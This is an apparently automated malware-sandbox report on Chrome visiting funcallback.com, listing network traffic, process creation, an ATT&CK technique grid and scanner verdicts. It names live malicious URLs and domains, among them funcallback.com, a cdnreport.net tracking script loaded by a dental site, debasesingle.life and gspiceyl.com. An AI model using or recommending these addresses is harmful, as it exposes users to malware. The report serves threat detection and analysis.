Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49713 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.3.84.131:443 -> 192.168.2.16:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.3.84.131:443 -> 192.168.2.16:49721 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.165.165.26:443 -> 192.168.2.16:49744 version: TLS 1.2
Source: classification engineClassification label: mal72.win@21/187@44/15
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://funcallback.com/
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1856,i,12264961050259194225,6932832445038562369,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1856,i,12264961050259194225,6932832445038562369,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Registry Run Keys / Startup Folder
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://funcallback.com100%Avira URL Cloudmalware
https://funcallback.com20%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/happy.jpg0%Avira URL Cloudsafe
https://exodontia.info/aneurysmal-bone-cyst/0%Avira URL Cloudsafe
https://dentalhealthstop.co.uk/private-dental-treatments/operculectomy/0%Avira URL Cloudsafe
https://dentalhealthstop.co.uk/private-dental-treatments/0%Avira URL Cloudsafe
https://exodontia.info/wp-json/0%Avira URL Cloudsafe
https://funcallback.com/favicon.ico100%Avira URL Cloudmalware
https://exodontia.info/oral-sub-mucous-fibrosis/0%Avira URL Cloudsafe
https://exodontia.info/wp-content/themes/themify-shoppe/themify/themify-builder/css/modules/bg-zoom.0%Avira URL Cloudsafe
https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/surgery.jpg0%Avira URL Cloudsafe
https://dentalhealthstop.co.uk/nhs-dental-treatments/dentures/0%Avira URL Cloudsafe
https://dentalhealthstop.co.uk/private-dental-treatments/operculectomy/0%VirustotalBrowse
https://exodontia.info/membership-links/0%Avira URL Cloudsafe
https://cdnreport.net/browser.php?pixel=1&os=win&browser=chrome&domain=exodontia.info100%Avira URL Cloudmalware
https://exodontia.info/alveoplasty/0%Avira URL Cloudsafe
https://exodontia.info/actinic-cheilitis/0%Avira URL Cloudsafe
https://exodontia.info/dentigerous-cyst/0%Avira URL Cloudsafe
https://dentalhealthstop.co.uk/nhs-dental-treatments/0%Avira URL Cloudsafe
https://exodontia.info/wp-content/uploads/2021/06/Exodontia-Homepage-01-copy.png0%Avira URL Cloudsafe
https://exodontia.info/median-rhomboid-glossitis/0%Avira URL Cloudsafe
https://dentalhealthstop.co.uk/website-privacy-policy0%Avira URL Cloudsafe
https://exodontia.info/xmlrpc.php?rsd0%Avira URL Cloudsafe
https://exodontia.info/jaw-dislocation/0%Avira URL Cloudsafe
https://exodontia.info/desquamative-gingivitis/0%Avira URL Cloudsafe
https://dentalhealthstop.co.uk/wp-content/themes/dentalhealthstop/images/dhs-icon.png0%Avira URL Cloudsafe
https://exodontia.info/feed/0%Avira URL Cloudsafe
https://exodontia.info/wp-content/uploads/2021/07/Exodontia-Homepage-01-copy.png0%Avira URL Cloudsafe
https://exodontia.info/dry-mouth-xerostomia/0%Avira URL Cloudsafe
https://exodontia.info/clicking-tmj-exercises/0%Avira URL Cloudsafe
https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/reason-2.png0%Avira URL Cloudsafe
https://exodontia.info/zinc-deficiency/0%Avira URL Cloudsafe
https://exodontia.info/atypical-odontalgia/0%Avira URL Cloudsafe
https://exodontia.info/candidal-leukoplakia/0%Avira URL Cloudsafe
https://exodontia.info/wp-content/plugins/wp-gdpr-compliance/Assets/js/front.min.js?ver=17065550110%Avira URL Cloudsafe
https://exodontia.info/wp-content/themes/themify-shoppe/themify/themify-builder/css/modules/frames.c0%Avira URL Cloudsafe
https://exodontia.info/minor-salivary-gland-biopsy-for-sjogrens-syndrome-diagnosis/0%Avira URL Cloudsafe
https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/desk.jpg0%Avira URL Cloudsafe
https://exodontia.info/wp-content/themes/themify-shoppe/themify/js/modules/edge.Menu.js?ver=5.6.40%Avira URL Cloudsafe
https://exodontia.info/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fexodontia.info%2Fadverts-sponsors-0%Avira URL Cloudsafe
https://dentalhealthstop.co.uk/private-dental-treatments/wisdom-teeth-removal/0%Avira URL Cloudsafe
https://exodontia.info/wp-content/uploads/2021/06/Medical_Management_of_BMS.png0%Avira URL Cloudsafe
https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/home-treatment-1.jpg0%Avira URL Cloudsafe
https://exodontia.info/platelet-disorders-deficiencies/0%Avira URL Cloudsafe
https://exodontia.info/oral-cancer-oral-screening/0%Avira URL Cloudsafe
http://funcallback.com/100%Avira URL Cloudmalware
https://exodontia.info/wp-content/plugins/wp-gdpr-compliance/Assets/css/front.css?ver=17065550110%Avira URL Cloudsafe
https://autoprefixer.github.io0%Avira URL Cloudsafe
https://exodontia.info/wp-content/plugins/loading-page/css/loading-page.css?ver=free-1.1.100%Avira URL Cloudsafe
https://exodontia.info/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.10%Avira URL Cloudsafe
https://exodontia.info/closure-of-mouth-sinus-holes/0%Avira URL Cloudsafe
https://exodontia.info/mouth-sinus-holes-oro-antral-communications/0%Avira URL Cloudsafe
https://exodontia.info/operculectomy/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
google.com
142.251.2.139
truefalse
    high
    debasesingle.life
    31.41.44.109
    truetrue
      unknown
      maxcdn.bootstrapcdn.com
      104.18.11.207
      truefalse
        high
        exodontia.info
        153.92.6.142
        truefalse
          unknown
          dentalhealthstop.co.uk
          91.238.164.176
          truefalse
            unknown
            stake.libertariancounterpoint.com
            185.158.251.240
            truetrue
              unknown
              funcallback.com
              31.41.44.109
              truetrue
                unknown
                cdnreport.net
                46.17.248.12
                truefalse
                  unknown
                  code.jquery.com
                  151.101.2.137
                  truefalse
                    high
                    cdnjs.cloudflare.com
                    104.17.25.14
                    truefalse
                      high
                      gspiceyl.com
                      31.41.44.109
                      truetrue
                        unknown
                        www.google.com
                        142.250.141.106
                        truefalse
                          high
                          upload.wikimedia.org
                          198.35.26.112
                          truefalse
                            high
                            use.typekit.net
                            unknown
                            unknownfalse
                              high
                              use.fontawesome.com
                              unknown
                              unknownfalse
                                high
                                p.typekit.net
                                unknown
                                unknownfalse
                                  high
                                  NameMaliciousAntivirus DetectionReputation
                                  https://dentalhealthstop.co.uk/contact/false
                                    unknown
                                    https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=ht&oit=1&cp=2&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                      high
                                      https://funcallback.com/favicon.icotrue
                                      • Avira URL Cloud: malware
                                      unknown
                                      https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/surgery.jpgfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://cdnjs.cloudflare.com/ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.cssfalse
                                        high
                                        https://cdnreport.net/browser.php?pixel=1&os=win&browser=chrome&domain=exodontia.infofalse
                                        • Avira URL Cloud: malware
                                        unknown
                                        https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fexodontia.in&oit=3&cp=20&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                          high
                                          https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fdentalhealthstop&oit=3&cp=24&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                            high
                                            https://exodontia.info/wp-content/uploads/2021/06/Exodontia-Homepage-01-copy.pngfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fex&oit=3&cp=10&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                              high
                                              https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2Fdentalhealthstop&oit=3&cp=7&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                                high
                                                https://funcallback.com/false
                                                  unknown
                                                  https://dentalhealthstop.co.uk/wp-content/themes/dentalhealthstop/images/dhs-icon.pngfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://exodontia.info/wp-content/uploads/2021/07/Exodontia-Homepage-01-copy.pngfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/reason-2.pngfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://exodontia.info/wp-content/plugins/wp-gdpr-compliance/Assets/js/front.min.js?ver=1706555011false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=http%3A%2F%2Ffuncallback.com&oit=3&cp=4&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                                    high
                                                    https://dentalhealthstop.co.uk/wp-content/uploads/2017/03/desk.jpgfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://exodontia.info/wp-content/themes/themify-shoppe/themify/js/modules/edge.Menu.js?ver=5.6.4false
                                                    • Avira URL Cloud: safe
                                                    unknown
